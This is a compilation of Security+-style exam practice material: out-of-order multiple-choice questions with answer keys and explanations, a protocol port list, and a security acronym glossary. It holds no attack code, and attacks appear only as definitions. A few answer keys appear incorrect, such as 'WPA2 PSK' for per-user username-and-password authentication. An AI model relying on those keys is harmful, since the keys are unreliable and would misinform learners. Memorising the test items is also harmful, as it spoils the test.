13. A replay attack occurs when an attacker intercepts user credentials and tries to use this information later for gaining unauthorized access to resources on a network. A. True B. False

Answer: A. True Explanation: A replay attack occurs when an attacker intercepts user credentials and tries to use this information later for gaining unauthorized access to resources on a network.

26. Which IPsec mode provides whole packet encryption? A. Tunnel B. Payload C. Transport D. Host-to-host

Answer: A. Tunnel Explanation: IPsec can be implemented in a host-to-host transport mode (where only the payload of the IP packet is usually encrypted and/or authenticated) or in a network tunnel mode (where the entire IP packet is encrypted and/or authenticated).

18. Gaining unauthorized access to a Bluetooth device is referred to as: A. Xmas attack B. Bluesnarfing C. Bluejacking D. Pharming

Answer: B. Bluesnarfing Explanation: Gaining unauthorized access to a Bluetooth device is referred to as bluesnarfing.

36. Steganography allows for: A. Checking data integrity B. Calculating hash values C. Hiding data within another piece of data D. Data encryption

Answer: C. Hiding data within another piece of data Explanation: Steganography allows for hiding data within another piece of data.

POP3 - Post Office Protocol version 3 uses what port(s)?

110

NNTP - Network News Transfer Protocol uses what port(s)?

119

IMAP4 - Internet message access protocol version 4 uses what port(s)?

143

SNMP - Simple Network Management Protocol uses what port(s)?

161

SNMP Trap - Simple Network Management Protocol Trap uses what port(s)?

162

L2TP - Layer 2 Tunneling Protocol uses what port(s)?

1701

PPTP - Point-to-Point Tunneling Protocol uses what port(s)?

1723

FTP - File Transfer Protocol uses what port(s)?

20, 21

SCP - Secure Copy (uses SSH) uses what port(s)?

22

SFTP - Secure File Transfer Protocol (uses SSH) uses what port(s)?

22

SSH - Secure Shell uses what port(s)?

22

Telnet uses what port(s)?

23

SMTP - Simple Mail Transfer Protocol uses what port(s)?

25

RDP - Remote Desktop Protocol uses what port(s)?

3389

LDAP - Lightweight Directory Access Protocol uses what port(s)?

389

HTTPS - Hypertext Transfer Protocol Secure uses what port(s)?

443

SSL VPN - Secure Sockets Layer virtual private network uses what port(s)?

443

TACACS - Terminal Access Controller Access-Control System uses what port(s)?

49

ISAKMP (VPN) - Internet Security Association and Key Management Protocol (virtual private network) uses what port(s)?

500

Syslog uses what port(s)?

514

DNS - Domain Name System uses what port(s)?

53

DHCP - Dynamic Host Configuration Protocol uses what port(s)?

67, 68

TFTP - Trivial File Transfer Protocol uses what port(s)?

69

HTTP - Hypertext Transfer Protocol uses what port(s)?

80

Kerberos uses what port(s)?

88

22. An active/passive configuration has an impact on: a. Confidentiality b. Integrity c. Availability d. Non-Repudiation

C

61. Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken first? Choose two. a. Disable the compromised accounts b. Update WAF rules to block social networks c. Remove the compromised accounts from all AD groups d. Change the compromised accounts' passwords e. Disable open relay on the email server f. Enable sender policy framework

A,C

24. A security administrator is developing controls for creating audit trails if a PHI data breach is to occur. The administrator has been given the following requirements: all access must be correlated to a user account; all user accounts must be assigned to a single individual; user access to the PHI data must be recorded; anomalies in PHI data access must be reported; logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select three) a. Eliminate shared accounts b. Create a standard naming convention for accounts c. Implement usage auditing and review d. Enable account lockout thresholds e. Copy logs in real time to a secured WORM drive f. Implement time of day restrictions g. Perform regular permission audits and reviews

A,C,E

58. An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the best solutions for the organization? Select two. a. TACACS+ b. CHAP c. LDAP d. RADIUS e. MSCHAPv2

A,D

AUP

Acceptable use policy. An AUP defines proper system usage. It will often describe the purpose of computer systems and networks, how users can access them, and the responsibilities of users when accessing the systems.

ACE

Access Control Entry. Identifies a user or group that is granted permission to a resource. ACEs are contained within a DACL in NTFS.

ACL

Access control list. A list of rules used to grant access to a resource. In NTFS, a list of ACEs makes up the ACL for a resource. In a firewall, an ACL identifies traffic that is allowed or blocked based on IP addresses, networks, ports, and some protocols (using the protocol ID).

AP

Access point, short for wireless access point (WAP). APs provide access to a wired network to wireless clients. Many APs support isolation mode to segment wireless users from other wireless users.

ARP

Address Resolution Protocol. Resolves IP addresses to MAC addresses. ARP poisoning attacks can redirect traffic through an attacker's system by sending false MAC address updates. VLAN segregation helps limit the scope of ARP poisoning attacks within a network.

AES256

Advanced Encryption Standard 256 bit. AES sometimes includes the number of bits used in the encryption keys and AES256 uses 256-bit encryption keys.

AES

Advanced Encryption Standard. A symmetric algorithm used to encrypt data and provide confidentiality. AES is quick, highly secure, and used in a wide assortment of cryptography schemes. It includes key sizes of 128 bits, 192 bits, or 256 bits.

RSA

An asymmetric algorithm used to encrypt data and digitally sign transmissions. It is named after its creators, Rivest, Shamir, and Adleman, and RSA is also the name of the company they founded together. RSA relies on the mathematical properties of prime numbers when creating public and private keys.

ALE

Annualized loss expectancy. Used to measure risk with annualized rate of occurrence (ARO) and single loss expectancy (SLE). The ALE identifies the total amount of loss expected for a given risk. The calculation is SLE x ARO = ALE.

ARO

Annualized rate of occurrence. Used to measure risk with annualized loss expectancy (ALE) and single loss expectancy (SLE). The ARO identifies how many times a loss is expected to occur in a year. The calculation is SLE x ARO = ALE.

66. A set of physical characteristics of the human body that can be used for identification and access control purposes is known as: A. Biometrics B. PII C. Physical token D. ID

Answer: A. Biometrics Explanation: In computer security, biometrics refers to physical characteristics of the human body that can be used for identification and access control purposes.

17. The practice of sending unsolicited messages over Bluetooth is known as: A. Bluejacking B. Vishing C. Bluesnarfing D. Phishing

Answer: A. Bluejacking Explanation: Sending unsolicited messages over Bluetooth is known as bluejacking.

97. AES-based encryption mode implemented in WPA2 is known as: A. CCMP B. 3DES C. TKIP D. HMAC

Answer: A. CCMP Explanation: Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) is an encryption mode implemented in the Wi-Fi Protected Access II (WPA2) security protocol. CCMP relies on the Advanced Encryption Standard (AES), providing much stronger security than the Wired Equivalent Privacy (WEP) protocol and the Temporal Key Integrity Protocol (TKIP) implemented in Wi-Fi Protected Access (WPA).

43. An operating system security feature that ensures safe memory usage by applications is known as: A. DEP B. DLP C. DSU D. DRP

Answer: A. DEP Explanation: Data Execution Prevention (DEP) is a security feature in modern operating systems that monitors applications to make sure they use system memory safely. In a Microsoft environment, DEP is defined as a set of hardware and software technologies that perform additional checks on memory to help protect against malicious code exploits. If a program tries to execute code from memory in an incorrect way, DEP closes the program.

24. Which of the terms listed below refers to a situation where no alarm is raised when an attack has taken place? A. False negative B. True positive C. False positive D. True negative

Answer: A. False negative Explanation: A situation where no alarm is raised when an attack has taken place is an example of a false negative error.

19. Which of the following best describes an important security advantage yielded by implementing vendor diversity? a. Sustainability b. Homogeneity c. Resiliency d. Configurability

C

92. In computer security, the term dumpster diving is used to describe a practice of sifting through trash for discarded documents containing sensitive data. Found documents containing names and surnames of the employees along with the information about positions held in the company and other data can be used to facilitate social engineering attacks. Having the documents shredded or incinerated before disposal makes dumpster diving less effective and also mitigates the risk of social engineering attacks. A. True B. False

Answer: A. True Explanation: In computer security, the term dumpster diving is used to describe a practice of sifting through trash for discarded documents containing sensitive data. Found documents containing names and surnames of the employees along with the information about positions held in the company and other data can be used to facilitate social engineering attacks. Having the documents shredded or incinerated before disposal makes dumpster diving less effective and also mitigates the risk of social engineering attacks.

33. Network Access Control (NAC) defines a set of rules enforced in a network that the clients attempting to access the network must comply with. With NAC, policies can be enforced before or after end-stations gain access to the network. NAC can be implemented as Pre-admission NAC where a host must, for example, be virus free or have patches applied before it can be allowed to connect to the network, and/or Post-admission NAC, where a host is being granted/denied permissions based on its actions after it has been provided with the access to the network. A. True B. False

Answer: A. True Explanation: Network Access Control (NAC) defines a set of rules enforced in a network that the clients attempting to access the network must comply with. With NAC, policies can be enforced before or after end-stations gain access to the network. NAC can be implemented as Pre-admission NAC where a host must, for example, be virus free or have patches applied before it can be allowed to connect to the network, and/or Post-admission NAC, where a host is being granted/denied permissions based on its actions after it has been provided with the access to the network.

77. One of the goals behind the mandatory vacations policy is to mitigate the occurrence of fraudulent activity within the company. A. True B. False

Answer: A. True Explanation: One of the goals behind the mandatory vacations policy is to mitigate the occurrence of fraudulent activity within the company.

54. Which of the answers listed below refers to a firmware interface designed as a replacement for BIOS? A. UEFI B. ACPI C. CMOS D. USMT

Answer: A. UEFI Explanation: Unified Extensible Firmware Interface (UEFI) is a firmware interface designed as a replacement for BIOS. UEFI offers a variety of improvements over BIOS, including a Graphical User Interface (GUI), mouse support, network access capability, and Secure Boot functionality designed to prevent the loading of malware and unauthorized operating systems during the computer start-up process.

83. A type of risk assessment formula defining probable financial loss due to a risk over a one-year period is known as: A. ARO B. ALE C. SLE D. BPA

Answer: B. ALE Explanation: The Annual Loss Expectancy (ALE) risk assessment formula defines probable financial loss due to a risk over a one-year period.

80. Which of the following acronyms refers to a set of rules enforced in a network that restrict the use to which the network may be put? A. OEM B. AUP C. UAT D. ARO

Answer: B. AUP Explanation: Acceptable Use Policy (AUP) is a set of rules enforced in a network that restrict the use to which the network may be put.

45. Which of the following acronyms refers to a policy of permitting employees to bring personally owned mobile devices and to use those devices for accessing privileged company information and applications? A. BSOD B. BYOD C. JBOD D. BYOB

Answer: B. BYOD Explanation: The term Bring Your Own Device (BYOD) refers to a policy of permitting employees to bring personally owned mobile devices and to use those devices for accessing privileged company information and applications.

38. The practice of connecting to an open port on a remote server to gather more information about the service running on that port is referred to as: A. Bluejacking B. Banner grabbing C. Session hijacking D. eDiscovery

Answer: B. Banner grabbing Explanation: The practice of connecting to an open port on a remote server to gather more information about the service running on that port is referred to as banner grabbing.

88. In incident response procedures, a process that ensures proper handling of collected evidence is called: A. Intrusion detection/notification B. Chain of custody C. MSDS documentation D. Equipment grounding

Answer: B. Chain of custody Explanation: In incident response procedures, a process that ensures proper handling of collected evidence is called chain of custody.

79. A sticky note with a password kept in sight in a user's cubicle would be a violation of which of the following policies? A. Data labeling policy B. Clean desk policy C. User account policy D. Password complexity

Answer: B. Clean desk policy Explanation: A sticky note with a password kept in sight in a user's cubicle would be a violation of the clean desk policy.

32. Software- or hardware-based security solutions designed to detect and prevent unauthorized use and transmission of confidential information outside of a corporate network are referred to as: A. AUP B. DLP C. UAT D. LTO

Answer: B. DLP Explanation: Data Loss Prevention (DLP) solutions are software- or hardware-based security solutions designed to detect and prevent unauthorized use and transmission of confidential information outside of a corporate network.

90. A cold site is the most expensive type of backup site for an organization to operate. A. True B. False

Answer: B. False Explanation: A cold site is the least expensive type of backup site for an organization to operate. It is a type of alternate site that offers only the basic facilities, which means that in case of emergency all the equipment and data must be moved to the site first to make it operational.

23. Antivirus software identifying non-malicious code as a virus due to a faulty virus signature file is an example of: A. Fault tolerance B. False positive error C. Incident isolation D. False negative error

Answer: B. False positive error Explanation: Antivirus software identifying non-malicious code as a virus due to a faulty virus signature file is an example of a false positive error.

2. What is the first stage of symmetric encryption? a. Encrypt data using your Public Key b. Establish digital signatures c. Exchange encryption keys d. Install digital certificates

C

47. A type of protocol used in network management systems to monitor network-attached devices is known as: A. SIP B. SNMP C. NetBIOS D. RTP

Answer: B. SNMP Explanation: Simple Network Management Protocol (SNMP) is a UDP-based, Application Layer protocol used in network management systems to monitor network-attached devices. SNMP is typically integrated into most modern network infrastructure devices such as routers, bridges, switches, servers, printers, copiers, fax machines, and other network-attached devices. An SNMP-managed network consists of three key components: a managed device, a network-management software module that resides on a managed device (Agent), and a network management system (NMS) which executes applications that monitor and control managed devices and collect SNMP information from Agents. All SNMP-compliant devices include a virtual database called Management Information Base (MIB) containing information about configuration and state of the device that can be queried by the SNMP management station.

62. A cloud computing infrastructure type where applications are hosted over a network (typically Internet) eliminating the need to install and run the software on the customer's own computers is known as: A. Thick client B. SaaS C. Virtualization D. IaaS

Answer: B. SaaS Explanation: Software as a Service (SaaS) is a type of cloud computing infrastructure where applications are hosted over a network (typically the Internet), eliminating the need to install and run the software on the customer's own computers, which simplifies maintenance and support. Compared to conventional software deployment, which requires a licensing fee and often investment in additional hardware on the client side, SaaS can be delivered at a lower cost by providing remote access to applications and pricing based on a monthly or annual subscription fee.

7. Phishing scams targeting selected individuals/groups of users are referred to as: A. Vishing B. Spear phishing C. MITM attack D. Whaling

Answer: B. Spear phishing Explanation: Phishing scams targeting selected individuals/groups of users are referred to as spear phishing.

96. Which of the following wireless encryption schemes offers the highest level of protection? A. WEP B. WPA2 C. WAP D. WPA

Answer: B. WPA2 Explanation: Wi-Fi Protected Access (WPA) and Wired Equivalent Privacy (WEP) are encryption standards designed for securing wireless networks. WEP is an older standard and due to its vulnerabilities is not recommended. WPA was designed as an interim replacement for WEP, and WPA2 was introduced as the official standard offering the strongest security of the three.

16. Which of the following technologies simplifies configuration of new wireless networks by providing non-technical users with a capability to easily configure network security settings and add new devices to an existing network? A. WPA B. WPS C. WEP D. WAP

Answer: B. WPS Explanation: Wi-Fi Protected Setup (WPS) is a network security standard which simplifies configuration of new wireless networks by providing non-technical users with a capability to easily configure network security settings and add new devices to an existing network. WPS has known vulnerabilities and disabling this functionality is one of the recommended ways of securing the network.

39. What is the name of a command-line utility used for checking the reachability of a remote host? A. tracert B. ping C. nslookup D. netstat

Answer: B. ping Explanation: The command-line utility used for checking the reachability of a remote host is called ping. Ping operates by sending Internet Control Message Protocol (ICMP) echo request packets to the destination host and waiting for a reply.

84. In quantitative risk assessment, this formula is used for estimating the likelihood of occurrence of a future threat. A. ALE B. SLA C. ARO D. SLE

Answer: C. ARO Explanation: Annualized Rate of Occurrence (ARO) formula is an estimate based on the historical data of how often a threat would be successful in exploiting a vulnerability. In quantitative risk assessment, this term is used for estimating the likelihood of occurrence of a future threat.

11. A type of exploit that relies on overwriting contents of memory to cause unpredictable results in an application is called: A. IV attack B. SQL injection C. Buffer overflow D. Fuzz test

Answer: C. Buffer overflow Explanation: Buffer overflow is a type of exploit that relies on overwriting contents of memory to cause unpredictable results in an application.

71. A type of access control in computer security where every object has an owner who at his/her own discretion determines what kind of permissions other users can have to that object is known as: A. MAC B. ABAC C. DAC D. RBAC

Answer: C. DAC Explanation: In Discretionary Access Control (DAC) model every object has an owner who at his/her own discretion determines what kind of permissions other users can have to that object. DAC is also referred to as an access control method based on user identity.

35. What is the most effective way for permanent removal of data stored on a magnetic drive? A. Quick format B. Recycle bin C. Degaussing D. Low-level format

Answer: C. Degaussing Explanation: Degaussing provides the most effective way for permanent removal of data stored on a magnetic drive.

15. Which of the following terms refers to a rogue AP? A. Computer worm B. Backdoor C. Evil twin D. Trojan horse

Answer: C. Evil twin Explanation: An access point (AP) deployed by a hacker in order to steal user credentials or for the purpose of traffic eavesdropping is commonly referred to as rogue access point or evil twin.

72. Which of the following is an example of a biometric authentication? A. Password B. Smart card C. Fingerprint scanner D. User name

Answer: C. Fingerprint scanner Explanation: In computer security, a user's identity can be verified by examining something that the user knows (a user name or password), something that the user has (a physical object such as a smart card), or something that the user is (a unique trait of every single person, such as a fingerprint or the pattern of a human eye iris). Biometric authentication systems are based on examining the unique traits of a user, and a fingerprint scanner is an example of a biometric device.

37. A monitored host or network specifically designed to detect unauthorized access attempts is known as: A. Botnet B. Rogue access point C. Honeypot D. Flood guard

Answer: C. Honeypot Explanation: A monitored host or network specifically designed to detect unauthorized access attempts is known as a honeypot. This type of system contains no valuable data and is used to divert the attacker's attention from the corporate network. Multiple honeypots set up on a network are known as a honeynet.

30. A network access control method whereby the 48-bit address assigned to each network card is used to determine access to the network is known as: A. EMI shielding B. Hardware lock C. MAC filter D. Quality of Service (QoS)

Answer: C. MAC filter Explanation: The Network Access Control (NAC) method based on the physical address (MAC address) of the Network Interface Card (NIC) is called MAC filtering or MAC address filtering. A 48-bit MAC address is a unique number assigned to every network adapter. Devices acting as network access points can have certain MAC addresses blacklisted or whitelisted and, based on the entry on either of the lists, grant or deny access to the network.

50. Which of the following solutions is used to hide the internal IP addresses by modifying IP address information in IP packet headers while in transit across a traffic routing device? A. NAC B. ACL C. NAT D. DMZ

Answer: C. NAT Explanation: Network Address Translation (NAT) is a technology that provides an IP proxy between a private Local Area Network (LAN) and a public network such as the Internet. Computers on the private LAN can access the Internet through a NAT-capable router which handles the IP address translation. NAT hides the internal IP addresses by modifying IP address information in IP packet headers while in transit across a traffic routing device.

64. Which of the following cloud services would provide the best solution for a web developer intending to create a web app? A. SaaS B. API C. PaaS D. IaaS

Answer: C. PaaS Explanation: Platform as a Service (PaaS) is a category of cloud computing services providing cloud-based application development tools, in addition to services for testing, deploying, collaborating on, hosting, and maintaining applications.

4. A collection of software tools used by a hacker to mask intrusion and obtain administrator-level access to a computer or computer network is known as: A. Backdoor B. Botnet C. Rootkit D. Armored virus

Answer: C. Rootkit Explanation: The term rootkit refers to a collection of software tools used by a hacker to mask intrusion and obtain administrator-level access to a computer or computer network.

31. Which of the acronyms listed below refers to a technology that allows for real-time analysis of security alerts generated by network hardware and applications? A. LACP B. DSCP C. SIEM D. LWAPP

Answer: C. SIEM Explanation: Security Information and Event Management (SIEM) solutions are used for real-time analysis of security alerts generated by network hardware and applications.

74. An agreement between a service provider and the user(s) defining the nature, availability, quality, and scope of the service to be provided is known as: A. BPA B. MoU C. SLA D. ISA

Answer: C. SLA Explanation: An agreement between a service provider and the user(s) defining the nature, availability, quality, and scope of the service to be provided is known as Service Level Agreement (SLA).

28. A protocol that provides protection against switching loops is called: A. UTP B. SSH C. STP D. HMAC

Answer: C. STP Explanation: Spanning Tree Protocol (STP) is used to prevent switching loops. A switching loop occurs when there is more than one active link between two network switches, or when two ports on the same switch become connected to each other.

27. Which type of IDS relies on known attack patterns in order to detect an intrusion? A. Behavior-based B. Heuristic/behavioral C. Signature-based D. AD-IDS

Answer: C. Signature-based Explanation: Signature-based Intrusion Detection System is a type of IDS that relies on known attack patterns in order to detect intrusions.

3. What is adware? A. Unsolicited or undesired electronic messages B. Malicious program that sends copies of itself to other computers on the network C. Software that displays advertisements D. Malicious software that collects information about users without their knowledge

Answer: C. Software that displays advertisements Explanation: Adware is a type of software that displays advertisements on the user's system, often in the form of a pop-up window. Unsolicited or undesired electronic messages are known as spam. A malicious program that sends copies of itself to other computers on the network is called a computer worm (or simply a worm). Malicious software that collects information about users without their knowledge is referred to as spyware.

44. Which of the terms listed below refers to a mobile device's capability to share its Internet connection with other devices? A. Pairing B. Clustering C. Tethering D. Bonding

Answer: C. Tethering Explanation: The term tethering refers to a mobile device's capability to share its Internet connection with other devices.

53. What is the name of a technology that allows for storing passwords, certificates, or encryption keys in a hardware chip? A. Encrypting File System (EFS) B. Triple Digital Encryption Standard (3DES) C. Trusted Platform Module (TPM) D. Advanced Encryption Standard (AES)

Answer: C. Trusted Platform Module (TPM) Explanation: The Trusted Platform Module (TPM) is a specification, published by the Trusted Computing Group (TCG), for a microcontroller that can store secured information, and also the general name of implementations of that specification. Trusted Platform Modules are hardware-based security microcontrollers that store keys, passwords, and digital certificates and protect this data from external software attacks and physical theft. TPMs are usually embedded on the motherboard of a personal computer or laptop, but they can also be used in other devices such as mobile phones or network equipment. The nature of hardware-based cryptography ensures that the information stored in hardware is better protected from external attacks executed with the use of software.

14. URL hijacking is also referred to as: A. Session hijacking B. Sandboxing C. Typo squatting D. Shoulder surfing

Answer: C. Typo squatting Explanation: URL hijacking is also known as typo squatting. The term refers to the practice of registering a misspelled domain name closely resembling another well-established and popular domain name in the hope of getting Internet traffic from users who make errors while typing the web address into their browsers.

42. Which of the following acronyms refers to a network security solution combining the functionality of a firewall with additional safeguards such as URL filtering, content inspection, or malware inspection? A. MTU B. STP C. UTM D. XML

Answer: C. UTM Explanation: The term Unified Threat Management (UTM) refers to a network security solution (commonly in the form of a dedicated device called a UTM appliance) which combines the functionality of a firewall with additional safeguards such as URL filtering, spam filtering, gateway antivirus protection, intrusion detection or prevention, content inspection, or malware inspection.

9. An email message containing a warning related to a non-existent computer security threat, asking a user to delete system files falsely identified as malware, and/or prompting them to share the message with others would be an example of: A. Vishing B. Impersonation C. Virus hoax D. Phishing

Answer: C. Virus hoax Explanation: An email message containing a warning related to a non-existent computer security threat, asking a user to delete system files falsely identified as malware, and/or prompting them to share the message with others would be an example of a virus hoax.

12. Zero-day attack exploits: A. New accounts B. Patched software C. Vulnerability that is present in already released software but unknown to the software developer D. Well known vulnerability

Answer: C. Vulnerability that is present in already released software but unknown to the software developer Explanation: Zero-day attacks exploit vulnerabilities that are present in already released software but unknown to the software developer.

21. A penetration test conducted with the use of prior knowledge on how the system that is to be tested works is known as: A. White hat B. Sandbox C. White box D. Black box

Answer: C. White box Explanation: A penetration test conducted with the use of prior knowledge on how the system that is to be tested works is known as white box testing.

25. Which of the following answers refers to a set of rules that specify which users or system processes are granted access to objects as well as what operations are allowed on a given object? A. CRL B. NAT C. BCP D. ACL

Answer: D. ACL Explanation: An Access Control List (ACL) contains a set of rules that specify which users or system processes are granted access to objects as well as what operations are allowed on a given object.

73. Which of the following answers refers to a key document governing the relationship between two business organizations? A. ISA B. SLA C. MoU D. BPA

Answer: D. BPA Explanation: Business Partners Agreement (BPA) is a key document governing the relationship between two business organizations.

6. Which of the following answers refers to an undocumented way of gaining access to a program, online service, or an entire computer system? A. Tailgating B. Rootkit C. Trojan horse D. Backdoor

Answer: D. Backdoor Explanation: The term backdoor refers to an undocumented way of gaining access to a program, online service, or an entire computer system.

98. Which of the answers listed below refers to a security solution allowing administrators to block Internet access for users until they perform a required action? A. Access logs B. Mantrap C. Post-admission NAC D. Captive portal

Answer: D. Captive portal Explanation: Captive portals allow administrators to block Internet access for users until they perform a required action. An example captive portal could be a web page requiring authentication and/or payment (e.g. at a public Wi-Fi hotspot) before a user is allowed to proceed and use the Internet access service.

10. Which of the following attacks uses multiple compromised computer systems against its target? A. Spear phishing B. DoS C. Watering hole attack D. DDoS

Answer: D. DDoS Explanation: As opposed to simple Denial of Service (DoS) attacks, which are usually performed from a single system, a Distributed Denial of Service (DDoS) attack uses multiple compromised computer systems to perform an attack against its target. The intermediary systems that are used as a platform for the attack are the secondary victims of the DDoS attack; they are often referred to as zombies, and collectively as a botnet. The goal of DoS and DDoS attacks is to flood the bandwidth or resources of a targeted system so that it becomes overwhelmed with false requests and, as a result, does not have the time or resources to handle legitimate requests.

49. A lightly protected subnet consisting of publicly available servers placed on the outside of the company's firewall is known as: A. VPN B. Access Point (AP) C. VLAN D. DMZ

Answer: D. DMZ Explanation: In the context of computer security, the term Demilitarized Zone (DMZ) refers to a lightly protected subnet consisting of publicly available servers placed on the outside of the company's firewall.

60. The practice of finding vulnerabilities in an application by feeding it incorrect input is referred to as: A. Patching B. Exception handling C. Application hardening D. Fuzzing

Answer: D. Fuzzing Explanation: Finding vulnerabilities in an application by feeding it incorrect input is known as fuzzing, or fuzz testing.

8. What is tailgating? A. Looking over someone's shoulder to get information B. Scanning for unsecured wireless networks while driving in a car C. Manipulating a user into disclosing confidential information D. Gaining unauthorized access to restricted areas by following another person

Answer: D. Gaining unauthorized access to restricted areas by following another person Explanation: The practice of gaining unauthorized access to restricted areas by following another person is called tailgating. Looking over someone's shoulder to get information is known as shoulder surfing. The term war driving refers to scanning for unsecured wireless networks while driving in a car. Manipulating/deceiving users into disclosing confidential information is known as social engineering.

41. Which of the terms listed below refers to a security solution implemented on an individual computer host monitoring that specific system for malicious activities or policy violations? A. NIPS B. Content filter C. Firewall D. HIDS

Answer: D. HIDS Explanation: Host Based Intrusion Detection System (HIDS) is a security application designed to monitor and analyze the local computer system for malicious or anomalous activity. Common examples of HIDS are antivirus software and anti-spyware applications.

59. Which of the following solutions is used for controlling temperature and humidity? A. Faraday cage B. UART C. EMI shielding D. HVAC

Answer: D. HVAC Explanation: Heating, Ventilation, and Air Conditioning (HVAC) systems are used for controlling temperature and humidity.

70. An access control model in which every resource has a sensitivity label matching clearance level assigned to a user is called: A. RBAC B. DAC C. HMAC D. MAC

Answer: D. MAC Explanation: Mandatory Access Control (MAC) is an access control model where every resource has a sensitivity label matching a clearance level assigned to a user (to be able to access the resource, the user's clearance level must be equal to or higher than the sensitivity level assigned to the resource). With mandatory access control, users cannot set or change access policies at their own discretion; labels and clearance levels can only be applied and changed by an administrator.

91. Restoring data from an incremental backup requires: (Select 2 answers) A. Copy of the last incremental backup B. All copies of differential backups made since the last full backup C. Copy of the last differential backup D. All copies of incremental backups made since the last full backup E. Copy of the last full backup

Answers: D and E. All copies of incremental backups made since the last full backup and Copy of the last full backup Explanation: Restoring data from an incremental backup requires a copy of the last full backup as well as all copies of incremental backups made since the last full backup.

AH

Authentication Header. IPsec includes both AH and ESP. AH provides authentication and integrity, and ESP provides confidentiality, integrity, and authentication. AH is identified with protocol ID number 51.

AAA

Authentication, Authorization, and Accounting. AAA protocols are used in remote access systems. For example, TACACS+ is an AAA protocol that uses multiple challenges and responses during a session. Authentication verifies a user's identification. Authorization determines if a user should have access. Accounting tracks a user's access with logs.

1. You must authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be most appropriate to achieve this objective? a. WPA b. WPA2 PSK c. WPA2-CCMP d. WPS

B

11. An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented? a. Use a camera for facial recognition b. Have users sign their name naturally c. Require a palm geometry scan d. Implement iris recognition

B

14. A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to minimize the risk? a. Enable CHAP b. Disable NTLM c. Enable Kerberos d. Disable PAP

B

20. Which of the following refers to the term to restore a system to its operational state? a. MTBF b. MTTR c. RTO d. RPO

B

25. A security administrator receives an alert from a third party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four thousand different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be best for the security administrator to implement to most efficiently assist with this issue? a. SSL b. CRL c. PKI d. ACL

B

29. A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network? a. Open wireless network and SSL VPN b. WPA using a preshared key c. WPA2 using a RADIUS back end for 802.1x authentication d. WEP with a 40 bit key

B

33. A company is looking for an authentication protocol that uses tickets and time stamps to ensure the validity and prevent against replay attacks. Which of the following would be best suited to meet this requirement? a. TACACS+ b. Kerberos c. RADIUS d. MSCHAP

B

5. A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? a. Vulnerability scanner b. Network based IDS c. Rogue System detection d. Configuration compliance scanner

C. A scanner whose job is to identify new hosts appearing on the network is rogue system detection; a network-based IDS inspects traffic for attack signatures rather than inventorying hosts.

75. An analyst receives an alert from the SIEM showing an IP Address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue? a. Firewall, implement an ACL on the interface b. Router, place the correct subnet on the interface c. Switch, modify the access port to trunk port d. Proxy, add the correct transparent interface

B

62. A security administrator has written a script that will automatically upload binary and text based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? Choose two. a. TOTP b. SCP c. FTP over a nonstandard port d. SRTP e. Certificate based authentication f. SNMPv3

B,E

BIOS

Basic Input/Output System. A computer's firmware used to manipulate different settings such as the date and time, boot drive, and access password.

BCP

Business continuity plan. A plan that helps an organization predict and plan for potential outages of critical services or functions. It includes disaster recovery elements that provide the steps used to return critical functions to operation after an outage. A BIA is a part of a BCP and the BIA drives decisions to create redundancies such as failover clusters or alternate sites.

BIA

Business impact analysis. The BIA identifies critical business or mission requirements and includes elements such as Recovery Time Objectives (RTOs) and Recovery Point Objectives (RPOs), but it doesn't identify solutions.

10. Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal? a. PIN b. Security question c. Smart Card d. Passphrase e. CAPTCHA

C

15. Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the most secure method of time synchronization? a. The servers should connect to external Stratum 0 NTP servers for synchronization b. The servers should connect to internal Stratum 0 NTP servers for synchronization c. The servers should connect to external Stratum 1 NTP servers for synchronization d. The servers should connect to internal Stratum 1 NTP servers for synchronization

D. Stratum 0 devices are reference clocks (GPS, atomic), not NTP servers a host connects to, so only the Stratum 1 options are possible; internal Stratum 1 servers keep time synchronization off the Internet and under the organization's control, which is the most secure of the four.

17. A security specialist must confirm file backups match the original copy. Which of the following should th3e security specialist use to accomplish the objective? a. AES b. 3DES c. MD5 d. RSA

C

QUESTION 109 A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected with full disk encryption, and the permissions are set as follows:
File system permissions: Users = Read Only
Share permission: accounting-svc = Read Only
Given the listed protections are in place and unchanged, to which of the following risks is the data still subject? A. Exploitation of local console access and removal of data B. Theft of physical hard drives and a breach of confidentiality C. Remote exfiltration of data using domain credentials D. Disclosure of sensitive data to third parties due to excessive share permissions

Correct Answer: A

QUESTION 111 Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero-day attack

Correct Answer: A

QUESTION 130A senior incident response manager receives a call about some external IPs communicating with internal computers during off-hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus

Correct Answer: A

QUESTION 138Which of the following allows an auditor to test proprietary-software compiled code for security flaws? A. Fuzzing B. Static review C. Code signing D. Regression testing

Correct Answer: A

